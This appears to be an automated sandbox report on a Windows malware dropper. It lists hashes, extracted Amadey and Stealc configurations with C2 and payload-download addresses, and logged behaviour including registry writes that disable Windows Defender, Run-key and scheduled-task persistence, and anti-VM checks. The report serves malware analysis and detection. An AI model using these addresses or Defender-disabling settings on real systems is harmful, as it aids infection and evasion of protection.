Analysis
-
max time kernel
147s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
26/03/2025, 19:29
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
931cf964ce6a57469dbb4b1348d731da
-
SHA1
6c45ca1ac7bf0127a96895a9f41750f33f36153e
-
SHA256
4ffbf2eea50d30a9b549d0fd43259de752c0a6dbb7f54df2c94c9c682189a712
-
SHA512
310ee9fc767881d55c68fe88d36816904afa3bc6f8ac7784605cf2cd44237d7f854f85ca3f5b548665f1d471fb2fb39edcd6a7d6d5d0df8113fb6587a8f11f6e
-
SSDEEP
24576:lqDEvCTbMWu7rQYlBQcBiT6rprG8a00u:lTvC/MTQYxsWR7a00
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 4 IoCs
resource yara_rule behavioral1/memory/3048-527-0x00000000012C0000-0x0000000001712000-memory.dmp healer behavioral1/memory/3048-528-0x00000000012C0000-0x0000000001712000-memory.dmp healer behavioral1/memory/3048-549-0x00000000012C0000-0x0000000001712000-memory.dmp healer behavioral1/memory/2756-562-0x00000000060D0000-0x000000000658A000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 2800dc5678.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 2800dc5678.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 2800dc5678.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 2800dc5678.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 2800dc5678.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 2800dc5678.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 2800dc5678.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 2800dc5678.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 2800dc5678.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 2800dc5678.exe -
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Netsupport family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 458f5962ca.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b556799e91.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ea6e8dda70.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempKRJKXBINCLOTO4DE8F4SCNUOXVYYU2A2.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9260698ccd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f98d469f2d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2800dc5678.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2888 powershell.exe 12 2728 powershell.exe 13 1316 powershell.exe -
pid Process 2216 powershell.exe 3008 powershell.exe 1452 powershell.exe 2888 powershell.exe 2728 powershell.exe 1316 powershell.exe -
Downloads MZ/PE file 16 IoCs
flow pid Process 13 1316 powershell.exe 140 2756 rapes.exe 143 2756 rapes.exe 7 2756 rapes.exe 7 2756 rapes.exe 7 2756 rapes.exe 7 2756 rapes.exe 7 2756 rapes.exe 7 2756 rapes.exe 7 2756 rapes.exe 7 2756 rapes.exe 7 2756 rapes.exe 7 2756 rapes.exe 144 2756 rapes.exe 4 2888 powershell.exe 12 2728 powershell.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 458f5962ca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f98d469f2d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2800dc5678.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ea6e8dda70.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ea6e8dda70.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 458f5962ca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempKRJKXBINCLOTO4DE8F4SCNUOXVYYU2A2.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempKRJKXBINCLOTO4DE8F4SCNUOXVYYU2A2.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2800dc5678.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b556799e91.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9260698ccd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f98d469f2d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b556799e91.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9260698ccd.exe -
Executes dropped EXE 29 IoCs
pid Process 2796 TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE 2756 rapes.exe 3000 dBSGwVB.exe 1808 bild.exe 2504 kDveTWY.exe 2816 c282bd3fc1.exe 2156 TempKRJKXBINCLOTO4DE8F4SCNUOXVYYU2A2.EXE 2264 483d2fa8a0d53818306efeb32d3.exe 2296 ruKazpr.exe 2468 ruKazpr.exe 2552 9260698ccd.exe 2332 f98d469f2d.exe 2204 e77f7e910d.exe 3048 2800dc5678.exe 3324 b556799e91.exe 3928 ea6e8dda70.exe 3164 svchost015.exe 3088 458f5962ca.exe 1972 svchost015.exe 3652 kDveTWY.exe 3792 dBSGwVB.exe 3820 bild.exe 3908 bild.exe 3504 WLbfHbp.exe 3616 Exam.com 3816 f73ae_003.exe 3416 TbV75ZR.exe 3588 Exam.com 3760 7IIl2eE.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine TempKRJKXBINCLOTO4DE8F4SCNUOXVYYU2A2.EXE Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine f98d469f2d.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine ea6e8dda70.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 458f5962ca.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 9260698ccd.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 2800dc5678.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine b556799e91.exe -
Loads dropped DLL 64 IoCs
pid Process 2888 powershell.exe 2796 TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE 2756 rapes.exe 2368 cmd.exe 1808 bild.exe 1808 bild.exe 1808 bild.exe 1808 bild.exe 1808 bild.exe 2756 rapes.exe 2756 rapes.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2204 WerFault.exe 2756 rapes.exe 2728 powershell.exe 1316 powershell.exe 2756 rapes.exe 2296 ruKazpr.exe 2468 ruKazpr.exe 2468 ruKazpr.exe 2468 ruKazpr.exe 2468 ruKazpr.exe 2468 ruKazpr.exe 2468 ruKazpr.exe 2468 ruKazpr.exe 2756 rapes.exe 2756 rapes.exe 2756 rapes.exe 2756 rapes.exe 2756 rapes.exe 2756 rapes.exe 2756 rapes.exe 2756 rapes.exe 2756 rapes.exe 2756 rapes.exe 2756 rapes.exe 3928 ea6e8dda70.exe 2756 rapes.exe 2756 rapes.exe 3088 458f5962ca.exe 2756 rapes.exe 2756 rapes.exe 3648 WerFault.exe 3648 WerFault.exe 3648 WerFault.exe 3648 WerFault.exe 2756 rapes.exe 3820 bild.exe 3820 bild.exe 3820 bild.exe 3820 bild.exe 3908 bild.exe 3908 bild.exe 3908 bild.exe 3908 bild.exe 2756 rapes.exe 3504 WLbfHbp.exe 4032 CMD.exe 2756 rapes.exe 2756 rapes.exe 3416 TbV75ZR.exe 4000 CMD.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 2800dc5678.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 2800dc5678.exe -
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Netstat = "C:\\Users\\Public\\Netstat\\bild.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\c282bd3fc1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10342650101\\c282bd3fc1.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10342660121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\9260698ccd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10343000101\\9260698ccd.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\f98d469f2d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10343010101\\f98d469f2d.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\e77f7e910d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10343020101\\e77f7e910d.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\2800dc5678.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10343030101\\2800dc5678.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Netstat = "C:\\Users\\Public\\Netstat\\bild.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Netstat = "C:\\Users\\Public\\Netstat\\bild.exe" reg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001960c-124.dat autoit_exe behavioral1/files/0x000600000001a359-354.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 6 IoCs
pid Process 3932 tasklist.exe 2744 tasklist.exe 3600 tasklist.exe 3812 tasklist.exe 4060 tasklist.exe 3224 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 2796 TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE 2756 rapes.exe 2156 TempKRJKXBINCLOTO4DE8F4SCNUOXVYYU2A2.EXE 2264 483d2fa8a0d53818306efeb32d3.exe 2552 9260698ccd.exe 2332 f98d469f2d.exe 3048 2800dc5678.exe 3324 b556799e91.exe 3928 ea6e8dda70.exe 3088 458f5962ca.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3928 set thread context of 3164 3928 ea6e8dda70.exe 98 PID 3088 set thread context of 1972 3088 458f5962ca.exe 100 -
resource yara_rule behavioral1/memory/2468-271-0x000007FEF5AB0000-0x000007FEF6175000-memory.dmp upx -
Drops file in Windows directory 32 IoCs
description ioc Process File opened for modification C:\Windows\MandateFlashing WLbfHbp.exe File opened for modification C:\Windows\MandateFlashing TbV75ZR.exe File opened for modification C:\Windows\FinancingPortable TbV75ZR.exe File opened for modification C:\Windows\DollStriking TbV75ZR.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\AdministratorNhs WLbfHbp.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\VeryBulk WLbfHbp.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE File opened for modification C:\Windows\IstRepresentative WLbfHbp.exe File opened for modification C:\Windows\ThoseTransit WLbfHbp.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\ThoseTransit TbV75ZR.exe File opened for modification C:\Windows\SinghCooling TbV75ZR.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\FinancingPortable WLbfHbp.exe File opened for modification C:\Windows\SinghCooling WLbfHbp.exe File opened for modification C:\Windows\DollStriking WLbfHbp.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\ThinksMartin WLbfHbp.exe File opened for modification C:\Windows\VeryBulk TbV75ZR.exe File opened for modification C:\Windows\IstRepresentative TbV75ZR.exe File opened for modification C:\Windows\AdministratorNhs TbV75ZR.exe File opened for modification C:\Windows\ThinksMartin TbV75ZR.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0006000000019dbf-202.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WLbfHbp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2800dc5678.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dBSGwVB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f98d469f2d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TbV75ZR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e77f7e910d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ea6e8dda70.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c282bd3fc1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Exam.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Exam.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language e77f7e910d.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage e77f7e910d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dBSGwVB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b556799e91.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 458f5962ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2600 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 1736 taskkill.exe 2716 taskkill.exe 2928 taskkill.exe 2852 taskkill.exe 2264 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2676 schtasks.exe 1484 schtasks.exe 544 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 2888 powershell.exe 2888 powershell.exe 2888 powershell.exe 2796 TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE 2756 rapes.exe 2728 powershell.exe 2728 powershell.exe 2728 powershell.exe 2156 TempKRJKXBINCLOTO4DE8F4SCNUOXVYYU2A2.EXE 2216 powershell.exe 3008 powershell.exe 1452 powershell.exe 1316 powershell.exe 1316 powershell.exe 1316 powershell.exe 2264 483d2fa8a0d53818306efeb32d3.exe 2552 9260698ccd.exe 2552 9260698ccd.exe 2552 9260698ccd.exe 2552 9260698ccd.exe 2552 9260698ccd.exe 2332 f98d469f2d.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 3048 2800dc5678.exe 3048 2800dc5678.exe 3048 2800dc5678.exe 3048 2800dc5678.exe 3324 b556799e91.exe 3928 ea6e8dda70.exe 3928 ea6e8dda70.exe 3324 b556799e91.exe 3324 b556799e91.exe 3324 b556799e91.exe 3324 b556799e91.exe 3088 458f5962ca.exe 3616 Exam.com 3616 Exam.com 3616 Exam.com 3616 Exam.com 3616 Exam.com 3616 Exam.com 3588 Exam.com 3588 Exam.com 3588 Exam.com 3588 Exam.com 3588 Exam.com 3588 Exam.com -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 2888 powershell.exe Token: SeSecurityPrivilege 1808 bild.exe Token: SeDebugPrivilege 2728 powershell.exe Token: SeDebugPrivilege 2216 powershell.exe Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 1452 powershell.exe Token: SeDebugPrivilege 1316 powershell.exe Token: SeDebugPrivilege 2264 taskkill.exe Token: SeDebugPrivilege 1736 taskkill.exe Token: SeDebugPrivilege 2716 taskkill.exe Token: SeDebugPrivilege 2928 taskkill.exe Token: SeDebugPrivilege 2852 taskkill.exe Token: SeDebugPrivilege 2796 firefox.exe Token: SeDebugPrivilege 2796 firefox.exe Token: SeDebugPrivilege 3048 2800dc5678.exe Token: SeDebugPrivilege 4060 tasklist.exe Token: SeDebugPrivilege 3224 tasklist.exe Token: SeDebugPrivilege 3932 tasklist.exe Token: SeDebugPrivilege 2744 tasklist.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
pid Process 2144 2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2144 2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2144 2025-03-26_931cf964ce6a57469dbb4b1348d731da_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2796 TempTA7A6OWBDSRKQ6JN7V63MEKKWFLUFQS3.EXE 1808 bild.exe 2816 c282bd3fc1.exe 2816 c282bd3fc1.exe 2816 c282bd3fc1.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 2796 firefox.exe 2796 firefox.exe 2796 firefox.exe 2796 firefox.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 2204 e77f7e910d.exe 3616 Exam.com 3616 Exam.com 3616 Exam.com 3588 Exam.com 3588 Exam.com 3588 Exam.com -
Suspicious use of SendNotifyMessage 25 IoCs
